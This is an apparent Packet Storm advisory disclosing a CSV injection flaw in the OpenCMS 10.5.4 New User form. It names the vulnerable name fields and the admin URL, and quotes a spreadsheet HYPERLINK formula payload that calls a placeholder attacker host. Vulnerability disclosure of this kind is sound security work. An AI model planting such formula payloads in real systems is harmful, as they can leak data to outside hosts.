OpenCMS 10.5.4 CSV Injection

2019-05-10T00:00:00
ID PACKETSTORM:152827
Type packetstorm
Reporter Pramod Rana
Modified 2019-05-10T00:00:00

Description

                                        
                                            `Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New  
User module for parameter First Name and Last Name  
  
Impacted URL is  
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp  
  
Payload used is  
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")'  
  
Further details is available here  
https://github.com/alkacon/opencms-core/issues/636  
  
Already requested for CVE, yet to receive it.  
  
  
`